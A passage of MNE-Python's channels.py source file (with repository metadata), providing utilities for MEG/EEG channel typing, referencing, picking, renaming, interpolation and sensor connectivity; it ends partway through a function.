2017-09-12T11:08:26.000Z
|
2019-10-04T11:11:29.000Z
|
mne/channels/channels.py
|
massich/mne-python
|
9afcbcb21ca5df53eaf26911d0199dcc04bfc4ba
|
[
"BSD-3-Clause"
] | 3
|
2019-01-28T13:48:00.000Z
|
2019-07-10T16:02:11.000Z
|
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Matti Hamalainen <msh@nmr.mgh.harvard.edu>
# Denis Engemann <denis.engemann@gmail.com>
# Andrew Dykstra <andrew.r.dykstra@gmail.com>
# Teon Brooks <teon.brooks@gmail.com>
#
# License: BSD (3-clause)
import os
import os.path as op
import sys
import numpy as np
from scipy import sparse
from ..utils import (verbose, logger, warn, copy_function_doc_to_method_doc,
_check_preload, _validate_type, fill_doc, _check_option)
from ..io.compensator import get_current_comp
from ..io.constants import FIFF
from ..io.meas_info import anonymize_info, Info
from ..io.pick import (channel_type, pick_info, pick_types, _picks_by_type,
_check_excludes_includes, _contains_ch_type,
channel_indices_by_type, pick_channels, _picks_to_idx)
DEPRECATED_PARAM = object()
def _get_meg_system(info):
"""Educated guess for the helmet type based on channels."""
have_helmet = True
for ch in info['chs']:
if ch['kind'] == FIFF.FIFFV_MEG_CH:
# Only take first 16 bits, as higher bits store CTF grad comp order
coil_type = ch['coil_type'] & 0xFFFF
if coil_type == FIFF.FIFFV_COIL_NM_122:
system = '122m'
break
elif coil_type // 1000 == 3: # All Vectorview coils are 30xx
system = '306m'
break
elif (coil_type == FIFF.FIFFV_COIL_MAGNES_MAG or
coil_type == FIFF.FIFFV_COIL_MAGNES_GRAD):
nmag = np.sum([c['kind'] == FIFF.FIFFV_MEG_CH
for c in info['chs']])
system = 'Magnes_3600wh' if nmag > 150 else 'Magnes_2500wh'
break
elif coil_type == FIFF.FIFFV_COIL_CTF_GRAD:
system = 'CTF_275'
break
elif coil_type == FIFF.FIFFV_COIL_KIT_GRAD:
system = 'KIT'
break
elif coil_type == FIFF.FIFFV_COIL_BABY_GRAD:
system = 'BabySQUID'
break
elif coil_type == FIFF.FIFFV_COIL_ARTEMIS123_GRAD:
system = 'ARTEMIS123'
have_helmet = False
break
else:
system = 'unknown'
have_helmet = False
return system, have_helmet
def _get_ch_type(inst, ch_type, allow_ref_meg=False):
"""Choose a single channel type (usually for plotting).
Usually used in plotting to plot a single datatype, e.g. look for mags,
then grads, then ... to plot.
"""
if ch_type is None:
allowed_types = ['mag', 'grad', 'planar1', 'planar2', 'eeg']
allowed_types += ['ref_meg'] if allow_ref_meg else []
for type_ in allowed_types:
if isinstance(inst, Info):
if _contains_ch_type(inst, type_):
ch_type = type_
break
elif type_ in inst:
ch_type = type_
break
else:
raise RuntimeError('No plottable channel types found')
return ch_type
@verbose
def equalize_channels(candidates, verbose=None):
"""Equalize channel picks for a collection of MNE-Python objects.
Parameters
----------
candidates : list
list Raw | Epochs | Evoked | AverageTFR
%(verbose)s
Notes
-----
This function operates inplace.
"""
from ..io.base import BaseRaw
from ..epochs import BaseEpochs
from ..evoked import Evoked
from ..time_frequency import _BaseTFR
for candidate in candidates:
_validate_type(candidate,
(BaseRaw, BaseEpochs, Evoked, _BaseTFR),
"Instances to be modified",
"Raw, Epochs, Evoked or TFR")
chan_max_idx = np.argmax([c.info['nchan'] for c in candidates])
chan_template = candidates[chan_max_idx].ch_names
logger.info('Identifying common channels ...')
channels = [set(c.ch_names) for c in candidates]
common_channels = set(chan_template).intersection(*channels)
dropped = list()
for c in candidates:
drop_them = list(set(c.ch_names) - common_channels)
if drop_them:
c.drop_channels(drop_them)
dropped.extend(drop_them)
if dropped:
dropped = list(set(dropped))
logger.info('Dropped the following channels:\n%s' % dropped)
else:
logger.info('all channels are corresponding, nothing to do.')
class ContainsMixin(object):
"""Mixin class for Raw, Evoked, Epochs."""
def __contains__(self, ch_type):
"""Check channel type membership.
Parameters
----------
ch_type : str
Channel type to check for. Can be e.g. 'meg', 'eeg', 'stim', etc.
Returns
-------
in : bool
Whether or not the instance contains the given channel type.
Examples
--------
Channel type membership can be tested as::
>>> 'meg' in inst # doctest: +SKIP
True
>>> 'seeg' in inst # doctest: +SKIP
False
"""
if ch_type == 'meg':
has_ch_type = (_contains_ch_type(self.info, 'mag') or
_contains_ch_type(self.info, 'grad'))
else:
has_ch_type = _contains_ch_type(self.info, ch_type)
return has_ch_type
@property
def compensation_grade(self):
"""The current gradient compensation grade."""
return get_current_comp(self.info)
# XXX Eventually de-duplicate with _kind_dict of mne/io/meas_info.py
_human2fiff = {'ecg': FIFF.FIFFV_ECG_CH,
'eeg': FIFF.FIFFV_EEG_CH,
'emg': FIFF.FIFFV_EMG_CH,
'eog': FIFF.FIFFV_EOG_CH,
'exci': FIFF.FIFFV_EXCI_CH,
'ias': FIFF.FIFFV_IAS_CH,
'misc': FIFF.FIFFV_MISC_CH,
'resp': FIFF.FIFFV_RESP_CH,
'seeg': FIFF.FIFFV_SEEG_CH,
'stim': FIFF.FIFFV_STIM_CH,
'syst': FIFF.FIFFV_SYST_CH,
'bio': FIFF.FIFFV_BIO_CH,
'ecog': FIFF.FIFFV_ECOG_CH,
'fnirs_raw': FIFF.FIFFV_FNIRS_CH,
'fnirs_od': FIFF.FIFFV_FNIRS_CH,
'hbo': FIFF.FIFFV_FNIRS_CH,
'hbr': FIFF.FIFFV_FNIRS_CH}
_human2unit = {'ecg': FIFF.FIFF_UNIT_V,
'eeg': FIFF.FIFF_UNIT_V,
'emg': FIFF.FIFF_UNIT_V,
'eog': FIFF.FIFF_UNIT_V,
'exci': FIFF.FIFF_UNIT_NONE,
'ias': FIFF.FIFF_UNIT_NONE,
'misc': FIFF.FIFF_UNIT_V,
'resp': FIFF.FIFF_UNIT_NONE,
'seeg': FIFF.FIFF_UNIT_V,
'stim': FIFF.FIFF_UNIT_NONE,
'syst': FIFF.FIFF_UNIT_NONE,
'bio': FIFF.FIFF_UNIT_V,
'ecog': FIFF.FIFF_UNIT_V,
'fnirs_raw': FIFF.FIFF_UNIT_V,
'fnirs_od': FIFF.FIFF_UNIT_NONE,
'hbo': FIFF.FIFF_UNIT_MOL,
'hbr': FIFF.FIFF_UNIT_MOL}
_unit2human = {FIFF.FIFF_UNIT_V: 'V',
FIFF.FIFF_UNIT_T: 'T',
FIFF.FIFF_UNIT_T_M: 'T/m',
FIFF.FIFF_UNIT_MOL: 'M',
FIFF.FIFF_UNIT_NONE: 'NA',
FIFF.FIFF_UNIT_CEL: 'C'}
def _check_set(ch, projs, ch_type):
"""Ensure type change is compatible with projectors."""
new_kind = _human2fiff[ch_type]
if ch['kind'] != new_kind:
for proj in projs:
if ch['ch_name'] in proj['data']['col_names']:
raise RuntimeError('Cannot change channel type for channel %s '
'in projector "%s"'
% (ch['ch_name'], proj['desc']))
ch['kind'] = new_kind
class SetChannelsMixin(object):
"""Mixin class for Raw, Evoked, Epochs."""
@verbose
def set_eeg_reference(self, ref_channels='average', projection=False,
ch_type='auto', verbose=None):
"""Specify which reference to use for EEG data.
By default, MNE-Python will automatically re-reference the EEG signal
to use an average reference (see below). Use this function to
explicitly specify the desired reference for EEG. This can be either an
existing electrode or a new virtual channel. This function will
re-reference the data according to the desired reference and prevent
MNE-Python from automatically adding an average reference projection.
Some common referencing schemes and the corresponding value for the
``ref_channels`` parameter:
No re-referencing:
If the EEG data is already using the proper reference, set
``ref_channels=[]``. This will prevent MNE-Python from
automatically adding an average reference projection.
Average reference:
A new virtual reference electrode is created by averaging the
current EEG signal by setting ``ref_channels='average'``. Bad EEG
channels are automatically excluded if they are properly set in
``info['bads']``.
A single electrode:
Set ``ref_channels`` to a list containing the name of the channel
that will act as the new reference, for example
``ref_channels=['Cz']``.
The mean of multiple electrodes:
A new virtual reference electrode is created by computing the
average of the current EEG signal recorded from two or more
selected channels. Set ``ref_channels`` to a list of channel names,
indicating which channels to use. For example, to apply an average
mastoid reference, when using the 10-20 naming scheme, set
``ref_channels=['M1', 'M2']``.
Parameters
----------
ref_channels : list of str | str
The name(s) of the channel(s) used to construct the reference. To
apply an average reference, specify ``'average'`` here (default).
If an empty list is specified, the data is assumed to already have
a proper reference and MNE will not attempt any re-referencing of
the data. Defaults to an average reference.
projection : bool
If ``ref_channels='average'`` this argument specifies if the
average reference should be computed as a projection (True) or not
(False; default). If ``projection=True``, the average reference is
added as a projection and is not applied to the data (it can be
applied afterwards with the ``apply_proj`` method). If
``projection=False``, the average reference is directly applied to
the data. If ``ref_channels`` is not ``'average'``, ``projection``
must be set to ``False`` (the default in this case).
ch_type : 'auto' | 'eeg' | 'ecog' | 'seeg'
The name of the channel type to apply the reference to. If 'auto',
the first channel type of eeg, ecog or seeg that is found (in that
order) will be selected.
.. versionadded:: 0.19
%(verbose_meth)s
Returns
-------
inst : instance of Raw | Epochs | Evoked
Data with EEG channels re-referenced. If ``ref_channels='average'``
and ``projection=True`` a projection will be added instead of
directly re-referencing the data.
See Also
--------
mne.set_bipolar_reference : Convenience function for creating bipolar
references.
Notes
-----
1. If a reference is requested that is not the average reference, this
function removes any pre-existing average reference projections.
2. During source localization, the EEG signal should have an average
reference.
3. In order to apply a reference, the data must be preloaded. This is
not necessary if ``ref_channels='average'`` and ``projection=True``.
4. For an average reference, bad EEG channels are automatically
excluded if they are properly set in ``info['bads']``.
.. versionadded:: 0.9.0
"""
from ..io.reference import set_eeg_reference
return set_eeg_reference(self, ref_channels=ref_channels, copy=False,
projection=projection, ch_type=ch_type)[0]
def _get_channel_positions(self, picks=None):
"""Get channel locations from info.
Parameters
----------
picks : str | list | slice | None
None gets good data indices.
Notes
-----
.. versionadded:: 0.9.0
"""
picks = _picks_to_idx(self.info, picks)
chs = self.info['chs']
pos = np.array([chs[k]['loc'][:3] for k in picks])
n_zero = np.sum(np.sum(np.abs(pos), axis=1) == 0)
if n_zero > 1: # XXX some systems have origin (0, 0, 0)
raise ValueError('Could not extract channel positions for '
'{} channels'.format(n_zero))
return pos
def _set_channel_positions(self, pos, names):
"""Update channel locations in info.
Parameters
----------
pos : array-like | np.ndarray, shape (n_points, 3)
The channel positions to be set.
names : list of str
The names of the channels to be set.
Notes
-----
.. versionadded:: 0.9.0
"""
if len(pos) != len(names):
raise ValueError('Number of channel positions not equal to '
'the number of names given.')
pos = np.asarray(pos, dtype=np.float)
if pos.shape[-1] != 3 or pos.ndim != 2:
msg = ('Channel positions must have the shape (n_points, 3) '
'not %s.' % (pos.shape,))
raise ValueError(msg)
for name, p in zip(names, pos):
if name in self.ch_names:
idx = self.ch_names.index(name)
self.info['chs'][idx]['loc'][:3] = p
else:
msg = ('%s was not found in the info. Cannot be updated.'
% name)
raise ValueError(msg)
def set_channel_types(self, mapping):
"""Define the sensor type of channels.
Note: The following sensor types are accepted:
ecg, eeg, emg, eog, exci, ias, misc, resp, seeg, stim, syst, ecog,
hbo, hbr
Parameters
----------
mapping : dict
a dictionary mapping a channel to a sensor type (str)
{'EEG061': 'eog'}.
Notes
-----
.. versionadded:: 0.9.0
"""
ch_names = self.info['ch_names']
# first check and assemble clean mappings of index and name
unit_changes = dict()
for ch_name, ch_type in mapping.items():
if ch_name not in ch_names:
raise ValueError("This channel name (%s) doesn't exist in "
"info." % ch_name)
c_ind = ch_names.index(ch_name)
if ch_type not in _human2fiff:
raise ValueError('This function cannot change to this '
'channel type: %s. Accepted channel types '
'are %s.'
% (ch_type,
", ".join(sorted(_human2unit.keys()))))
# Set sensor type
_check_set(self.info['chs'][c_ind], self.info['projs'], ch_type)
unit_old = self.info['chs'][c_ind]['unit']
unit_new = _human2unit[ch_type]
if unit_old not in _unit2human:
raise ValueError("Channel '%s' has unknown unit (%s). Please "
"fix the measurement info of your data."
% (ch_name, unit_old))
if unit_old != _human2unit[ch_type]:
this_change = (_unit2human[unit_old], _unit2human[unit_new])
if this_change not in unit_changes:
unit_changes[this_change] = list()
unit_changes[this_change].append(ch_name)
self.info['chs'][c_ind]['unit'] = _human2unit[ch_type]
if ch_type in ['eeg', 'seeg', 'ecog']:
coil_type = FIFF.FIFFV_COIL_EEG
elif ch_type == 'hbo':
coil_type = FIFF.FIFFV_COIL_FNIRS_HBO
elif ch_type == 'hbr':
coil_type = FIFF.FIFFV_COIL_FNIRS_HBR
elif ch_type == 'fnirs_raw':
coil_type = FIFF.FIFFV_COIL_FNIRS_RAW
elif ch_type == 'fnirs_od':
coil_type = FIFF.FIFFV_COIL_FNIRS_OD
else:
coil_type = FIFF.FIFFV_COIL_NONE
self.info['chs'][c_ind]['coil_type'] = coil_type
msg = "The unit for channel(s) {0} has changed from {1} to {2}."
for this_change, names in unit_changes.items():
warn(msg.format(", ".join(sorted(names)), *this_change))
def rename_channels(self, mapping):
"""Rename channels.
Parameters
----------
mapping : dict | callable
a dictionary mapping the old channel to a new channel name
e.g. {'EEG061' : 'EEG161'}. Can also be a callable function
that takes and returns a string (new in version 0.10.0).
Notes
-----
.. versionadded:: 0.9.0
"""
rename_channels(self.info, mapping)
@verbose
def set_montage(
self, montage, raise_if_subset=DEPRECATED_PARAM, verbose=None
):
"""Set EEG sensor configuration and head digitization.
Parameters
----------
%(montage)s
raise_if_subset: bool
If True, ValueError will be raised when montage.ch_names is a
subset of info['ch_names']. This parameter was introduced for
backward compatibility when set to False.
Defaults to False in 0.19, it will change to default to True in
0.20, and will be removed in 0.21.
.. versionadded: 0.19
%(verbose_meth)s
Notes
-----
Operates in place.
.. versionadded:: 0.9.0
"""
# How to set up a montage to old named fif file (walk through example)
# https://gist.github.com/massich/f6a9f4799f1fbeb8f5e8f8bc7b07d3df
from .montage import _set_montage
_set_montage(self.info, montage, raise_if_subset=raise_if_subset)
return self
def plot_sensors(self, kind='topomap', ch_type=None, title=None,
show_names=False, ch_groups=None, to_sphere=True,
axes=None, block=False, show=True):
"""Plot sensor positions.
Parameters
----------
kind : str
Whether to plot the sensors as 3d, topomap or as an interactive
sensor selection dialog. Available options 'topomap', '3d',
'select'. If 'select', a set of channels can be selected
interactively by using lasso selector or clicking while holding
control key. The selected channels are returned along with the
figure instance. Defaults to 'topomap'.
ch_type : None | str
The channel type to plot. Available options 'mag', 'grad', 'eeg',
'seeg', 'ecog', 'all'. If ``'all'``, all the available mag, grad,
eeg, seeg and ecog channels are plotted. If None (default), then
channels are chosen in the order given above.
title : str | None
Title for the figure. If None (default), equals to ``'Sensor
positions (%s)' % ch_type``.
show_names : bool | array of str
Whether to display all channel names. If an array, only the channel
names in the array are shown. Defaults to False.
ch_groups : 'position' | array of shape (n_ch_groups, n_picks) | None
Channel groups for coloring the sensors. If None (default), default
coloring scheme is used. If 'position', the sensors are divided
into 8 regions. See ``order`` kwarg of :func:`mne.viz.plot_raw`. If
array, the channels are divided by picks given in the array.
.. versionadded:: 0.13.0
to_sphere : bool
Whether to project the 3d locations to a sphere. When False, the
sensor array appears similar as to looking downwards straight above
the subject's head. Has no effect when kind='3d'. Defaults to True.
.. versionadded:: 0.14.0
axes : instance of Axes | instance of Axes3D | None
Axes to draw the sensors to. If ``kind='3d'``, axes must be an
instance of Axes3D. If None (default), a new axes will be created.
.. versionadded:: 0.13.0
block : bool
Whether to halt program execution until the figure is closed.
Defaults to False.
.. versionadded:: 0.13.0
show : bool
Show figure if True. Defaults to True.
Returns
-------
fig : instance of Figure
Figure containing the sensor topography.
selection : list
A list of selected channels. Only returned if ``kind=='select'``.
See Also
--------
mne.viz.plot_layout
Notes
-----
This function plots the sensor locations from the info structure using
matplotlib. For drawing the sensors using mayavi see
:func:`mne.viz.plot_alignment`.
.. versionadded:: 0.12.0
"""
from ..viz.utils import plot_sensors
return plot_sensors(self.info, kind=kind, ch_type=ch_type, title=title,
show_names=show_names, ch_groups=ch_groups,
to_sphere=to_sphere, axes=axes, block=block,
show=show)
@copy_function_doc_to_method_doc(anonymize_info)
def anonymize(self):
"""
.. versionadded:: 0.13.0
"""
anonymize_info(self.info)
if hasattr(self, 'annotations'):
# XXX : anonymize should rather subtract a random date
# rather than setting it to None
self.annotations.orig_time = None
self.annotations.onset -= self._first_time
return self
class UpdateChannelsMixin(object):
"""Mixin class for Raw, Evoked, Epochs, AverageTFR."""
@verbose
def pick_types(self, meg=True, eeg=False, stim=False, eog=False,
ecg=False, emg=False, ref_meg='auto', misc=False,
resp=False, chpi=False, exci=False, ias=False, syst=False,
seeg=False, dipole=False, gof=False, bio=False, ecog=False,
fnirs=False, include=(), exclude='bads', selection=None,
verbose=None):
"""Pick some channels by type and names.
Parameters
----------
meg : bool | str
If True include all MEG channels. If False include None
If string it can be 'mag', 'grad', 'planar1' or 'planar2' to select
only magnetometers, all gradiometers, or a specific type of
gradiometer.
eeg : bool
If True include EEG channels.
stim : bool
If True include stimulus channels.
eog : bool
If True include EOG channels.
ecg : bool
If True include ECG channels.
emg : bool
If True include EMG channels.
ref_meg: bool | str
If True include CTF / 4D reference channels. If 'auto', the
reference channels are only included if compensations are present.
misc : bool
If True include miscellaneous analog channels.
resp : bool
If True include response-trigger channel. For some MEG systems this
is separate from the stim channel.
chpi : bool
If True include continuous HPI coil channels.
exci : bool
Flux excitation channel used to be a stimulus channel.
ias : bool
Internal Active Shielding data (maybe on Triux only).
syst : bool
System status channel information (on Triux systems only).
seeg : bool
Stereotactic EEG channels.
dipole : bool
Dipole time course channels.
gof : bool
Dipole goodness of fit channels.
bio : bool
Bio channels.
ecog : bool
Electrocorticography channels.
fnirs : bool | str
Functional near-infrared spectroscopy channels. If True include all
fNIRS channels. If False (default) include none. If string it can
be 'hbo' (to include channels measuring oxyhemoglobin) or 'hbr' (to
include channels measuring deoxyhemoglobin).
include : list of string
List of additional channels to include. If empty do not include
any.
exclude : list of string | str
List of channels to exclude. If 'bads' (default), exclude channels
in ``info['bads']``.
selection : list of string
Restrict sensor channels (MEG, EEG) to this list of channel names.
%(verbose_meth)s
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
pick_channels
Notes
-----
.. versionadded:: 0.9.0
"""
idx = pick_types(
self.info, meg=meg, eeg=eeg, stim=stim, eog=eog, ecg=ecg, emg=emg,
ref_meg=ref_meg, misc=misc, resp=resp, chpi=chpi, exci=exci,
ias=ias, syst=syst, seeg=seeg, dipole=dipole, gof=gof, bio=bio,
ecog=ecog, fnirs=fnirs, include=include, exclude=exclude,
selection=selection)
return self._pick_drop_channels(idx)
def pick_channels(self, ch_names):
"""Pick some channels.
Parameters
----------
ch_names : list
The list of channels to select.
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
drop_channels
pick_types
reorder_channels
Notes
-----
The channel names given are assumed to be a set, i.e. the order
does not matter. The original order of the channels is preserved.
You can use ``reorder_channels`` to set channel order if necessary.
.. versionadded:: 0.9.0
"""
return self._pick_drop_channels(
pick_channels(self.info['ch_names'], ch_names))
@fill_doc
def pick(self, picks, exclude=()):
"""Pick a subset of channels.
Parameters
----------
%(picks_all)s
exclude : list | str
Set of channels to exclude, only used when picking based on
types (e.g., exclude="bads" when picks="meg").
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
"""
picks = _picks_to_idx(self.info, picks, 'all', exclude,
allow_empty=False)
return self._pick_drop_channels(picks)
def reorder_channels(self, ch_names):
"""Reorder channels.
Parameters
----------
ch_names : list
The desired channel order.
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
drop_channels
pick_types
pick_channels
Notes
-----
Channel names must be unique. Channels that are not in ``ch_names``
are dropped.
.. versionadded:: 0.16.0
"""
_check_excludes_includes(ch_names)
idx = list()
for ch_name in ch_names:
ii = self.ch_names.index(ch_name)
if ii in idx:
raise ValueError('Channel name repeated: %s' % (ch_name,))
idx.append(ii)
return self._pick_drop_channels(idx)
def drop_channels(self, ch_names):
"""Drop channel(s).
Parameters
----------
ch_names : iterable or str
Iterable (e.g. list) of channel name(s) or channel name to remove.
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
reorder_channels
pick_channels
pick_types
Notes
-----
.. versionadded:: 0.9.0
"""
if isinstance(ch_names, str):
ch_names = [ch_names]
try:
all_str = all([isinstance(ch, str) for ch in ch_names])
except TypeError:
raise ValueError("'ch_names' must be iterable, got "
"type {} ({}).".format(type(ch_names), ch_names))
if not all_str:
raise ValueError("Each element in 'ch_names' must be str, got "
"{}.".format([type(ch) for ch in ch_names]))
missing = [ch for ch in ch_names if ch not in self.ch_names]
if len(missing) > 0:
msg = "Channel(s) {0} not found, nothing dropped."
raise ValueError(msg.format(", ".join(missing)))
bad_idx = [self.ch_names.index(ch) for ch in ch_names
if ch in self.ch_names]
idx = np.setdiff1d(np.arange(len(self.ch_names)), bad_idx)
return self._pick_drop_channels(idx)
def _pick_drop_channels(self, idx):
# avoid circular imports
from ..time_frequency import AverageTFR, EpochsTFR
_check_preload(self, 'adding, dropping, or reordering channels')
if getattr(self, 'picks', None) is not None:
self.picks = self.picks[idx]
if hasattr(self, '_cals'):
self._cals = self._cals[idx]
pick_info(self.info, idx, copy=False)
if getattr(self, '_projector', None) is not None:
self._projector = self._projector[idx][:, idx]
# All others (Evoked, Epochs, Raw) have chs axis=-2
axis = -3 if isinstance(self, (AverageTFR, EpochsTFR)) else -2
self._data = self._data.take(idx, axis=axis)
return self
def add_channels(self, add_list, force_update_info=False):
"""Append new channels to the instance.
Parameters
----------
add_list : list
A list of objects to append to self. Must contain all the same
type as the current object
force_update_info : bool
If True, force the info for objects to be appended to match the
values in `self`. This should generally only be used when adding
stim channels for which important metadata won't be overwritten.
.. versionadded:: 0.12
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
drop_channels
Notes
-----
If ``self`` is a Raw instance that has been preloaded into a
:obj:`numpy.memmap` instance, the memmap will be resized.
"""
# avoid circular imports
from ..io import BaseRaw, _merge_info
from ..epochs import BaseEpochs
_validate_type(add_list, (list, tuple), 'Input')
# Object-specific checks
for inst in add_list + [self]:
_check_preload(inst, "adding channels")
if isinstance(self, BaseRaw):
con_axis = 0
comp_class = BaseRaw
elif isinstance(self, BaseEpochs):
con_axis = 1
comp_class = BaseEpochs
else:
con_axis = 0
comp_class = type(self)
for inst in add_list:
_validate_type(inst, comp_class, 'All input')
data = [inst._data for inst in [self] + add_list]
# Make sure that all dimensions other than channel axis are the same
compare_axes = [i for i in range(data[0].ndim) if i != con_axis]
shapes = np.array([dat.shape for dat in data])[:, compare_axes]
for shape in shapes:
if not ((shapes[0] - shape) == 0).all():
raise AssertionError('All data dimensions except channels '
'must match, got %s != %s'
% (shapes[0], shape))
del shapes
# Create final data / info objects
infos = [self.info] + [inst.info for inst in add_list]
new_info = _merge_info(infos, force_update_to_first=force_update_info)
# Now update the attributes
if isinstance(self._data, np.memmap) and con_axis == 0 and \
sys.platform != 'darwin': # resizing not available--no mremap
# Use a resize and fill in other ones
out_shape = (sum(d.shape[0] for d in data),) + data[0].shape[1:]
n_bytes = np.prod(out_shape) * self._data.dtype.itemsize
self._data.flush()
self._data.base.resize(n_bytes)
self._data = np.memmap(self._data.filename, mode='r+',
dtype=self._data.dtype, shape=out_shape)
assert self._data.shape == out_shape
assert self._data.nbytes == n_bytes
offset = len(data[0])
for d in data[1:]:
this_len = len(d)
self._data[offset:offset + this_len] = d
offset += this_len
else:
self._data = np.concatenate(data, axis=con_axis)
self.info = new_info
if isinstance(self, BaseRaw):
self._cals = np.concatenate([getattr(inst, '_cals')
for inst in [self] + add_list])
return self
class InterpolationMixin(object):
"""Mixin class for Raw, Evoked, Epochs."""
@verbose
def interpolate_bads(self, reset_bads=True, mode='accurate',
origin=(0., 0., 0.04), verbose=None):
"""Interpolate bad MEG and EEG channels.
Operates in place.
Parameters
----------
reset_bads : bool
If True, remove the bads from info.
mode : str
Either ``'accurate'`` or ``'fast'``, determines the quality of the
Legendre polynomial expansion used for interpolation of MEG
channels.
origin : array-like, shape (3,) | str
Origin of the sphere in the head coordinate frame and in meters.
Can be ``'auto'``, which means a head-digitization-based origin
fit. Default is ``(0., 0., 0.04)``.
.. versionadded:: 0.17
%(verbose_meth)s
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
Notes
-----
.. versionadded:: 0.9.0
"""
from .interpolation import _interpolate_bads_eeg, _interpolate_bads_meg
_check_preload(self, "interpolation")
if len(self.info['bads']) == 0:
warn('No bad channels to interpolate. Doing nothing...')
return self
_interpolate_bads_eeg(self)
_interpolate_bads_meg(self, mode=mode, origin=origin)
if reset_bads is True:
self.info['bads'] = []
return self
def rename_channels(info, mapping):
"""Rename channels.
.. warning:: The channel names must have at most 15 characters
Parameters
----------
info : dict
Measurement info.
mapping : dict | callable
a dictionary mapping the old channel to a new channel name
e.g. {'EEG061' : 'EEG161'}. Can also be a callable function
that takes and returns a string (new in version 0.10.0).
"""
info._check_consistency()
bads = list(info['bads']) # make our own local copies
ch_names = list(info['ch_names'])
# first check and assemble clean mappings of index and name
if isinstance(mapping, dict):
orig_names = sorted(list(mapping.keys()))
missing = [orig_name not in ch_names for orig_name in orig_names]
if any(missing):
raise ValueError("Channel name(s) in mapping missing from info: "
"%s" % np.array(orig_names)[np.array(missing)])
new_names = [(ch_names.index(ch_name), new_name)
for ch_name, new_name in mapping.items()]
elif callable(mapping):
new_names = [(ci, mapping(ch_name))
for ci, ch_name in enumerate(ch_names)]
else:
raise ValueError('mapping must be callable or dict, not %s'
% (type(mapping),))
# check we got all strings out of the mapping
for new_name in new_names:
_validate_type(new_name[1], 'str', 'New channel mappings')
bad_new_names = [name for _, name in new_names if len(name) > 15]
if len(bad_new_names):
raise ValueError('Channel names cannot be longer than 15 '
'characters. These channel names are not '
'valid : %s' % new_names)
# do the remapping locally
for c_ind, new_name in new_names:
for bi, bad in enumerate(bads):
if bad == ch_names[c_ind]:
bads[bi] = new_name
ch_names[c_ind] = new_name
# check that all the channel names are unique
if len(ch_names) != len(np.unique(ch_names)):
raise ValueError('New channel names are not unique, renaming failed')
# do the remapping in info
info['bads'] = bads
for ch, ch_name in zip(info['chs'], ch_names):
ch['ch_name'] = ch_name
info._update_redundant()
info._check_consistency()
def _recursive_flatten(cell, dtype):
"""Unpack mat files in Python."""
if len(cell) > 0:
while not isinstance(cell[0], dtype):
cell = [c for d in cell for c in d]
return cell
@fill_doc
def read_ch_connectivity(fname, picks=None):
"""Parse FieldTrip neighbors .mat file.
More information on these neighbor definitions can be found on the related
`FieldTrip documentation pages
<http://www.fieldtrip.org/template/neighbours>`__.
Parameters
----------
fname : str
The file name. Example: 'neuromag306mag', 'neuromag306planar',
'ctf275', 'biosemi64', etc.
%(picks_all)s
Picks Must match the template.
Returns
-------
ch_connectivity : scipy.sparse.csr_matrix, shape (n_channels, n_channels)
The connectivity matrix.
ch_names : list
The list of channel names present in connectivity matrix.
See Also
--------
find_ch_connectivity
Notes
-----
This function is closely related to :func:`find_ch_connectivity`. If you
don't know the correct file for the neighbor definitions,
:func:`find_ch_connectivity` can compute the connectivity matrix from 2d
sensor locations.
"""
from scipy.io import loadmat
if not op.isabs(fname):
templates_dir = op.realpath(op.join(op.dirname(__file__),
'data', 'neighbors'))
templates = os.listdir(templates_dir)
for f in templates:
if f == fname:
break
if f == fname + '_neighb.mat':
fname += '_neighb.mat'
break
else:
raise ValueError('I do not know about this neighbor '
'template: "{}"'.format(fname))
fname = op.join(templates_dir, fname)
nb = loadmat(fname)['neighbours']
ch_names = _recursive_flatten(nb['label'], str)
picks = _picks_to_idx(len(ch_names), picks)
neighbors = [_recursive_flatten(c, str) for c in
nb['neighblabel'].flatten()]
assert len(ch_names) == len(neighbors)
connectivity = _ch_neighbor_connectivity(ch_names, neighbors)
# picking before constructing matrix is buggy
connectivity = connectivity[picks][:, picks]
ch_names = [ch_names[p] for p in picks]
return connectivity, ch_names
def _ch_neighbor_connectivity(ch_names, neighbors):
"""Compute sensor connectivity matrix.
Parameters
----------
ch_names : list of str
The channel names.
neighbors : list of list
A list of list of channel names. The neighbors to
which the channels in ch_names are connected with.
Must be of the same length as ch_names.
Returns
-------
ch_connectivity : scipy.sparse matrix
The connectivity matrix.
"""
if len(ch_names) != len(neighbors):
raise ValueError('`ch_names` and `neighbors` must '
'have the same length')
set_neighbors = {c for d in neighbors for c in d}
rest = set_neighbors - set(ch_names)
if len(rest) > 0:
raise ValueError('Some of your neighbors are not present in the '
'list of channel names')
for neigh in neighbors:
if (not isinstance(neigh, list) and
not all(isinstance(c, str) for c in neigh)):
raise ValueError('`neighbors` must be a list of lists of str')
ch_connectivity = np.eye(len(ch_names), dtype=bool)
for ii, neigbs in enumerate(neighbors):
ch_connectivity[ii, [ch_names.index(i) for i in neigbs]] = True
ch_connectivity = sparse.csr_matrix(ch_connectivity)
return ch_connectivity
def find_ch_connectivity(info, ch_type):
"""Find the connectivity matrix for the given channels.
This function tries to infer the appropriate connectivity matrix template
for the given channels. If a template is not found, the connectivity matrix
is computed using Delaunay triangulation based on 2d sensor locations.
Parameters
----------
info : instance of Info
The measurement info.
ch_type : str | None
The channel type for computing the connectivity matrix. Currently
supports 'mag', 'grad', 'eeg' and None. If None, the info must contain
only one channel type.
Returns
-------
ch_connectivity : scipy.sparse.csr_matrix, shape (n_channels, n_channels)
The connectivity matrix.
ch_names : list
The list of channel names present in connectivity matrix.
See Also
--------
read_ch_connectivity
Notes
-----
.. versionadded:: 0.15
Automatic detection of an appropriate connectivity matrix template only
works for MEG data at the moment. This means that the connectivity matrix
is always computed for EEG data and never loaded from a template file. If
you want to load a template for a given montage use
:func:`read_ch_connectivity` directly.
"""
if ch_type is None:
picks = channel_indices_by_type(info)
if sum([len(p) != 0 for p in picks.values()]) != 1:
raise ValueError('info must contain only one channel type if '
'ch_type is None.')
ch_type = channel_type(info, 0)
else:
_check_option('ch_type', ch_type, ['mag', 'grad', 'eeg'])
